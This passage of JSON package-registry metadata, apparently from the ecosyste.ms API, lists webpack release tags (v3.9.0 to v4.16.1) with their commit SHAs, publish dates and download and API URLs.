gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyst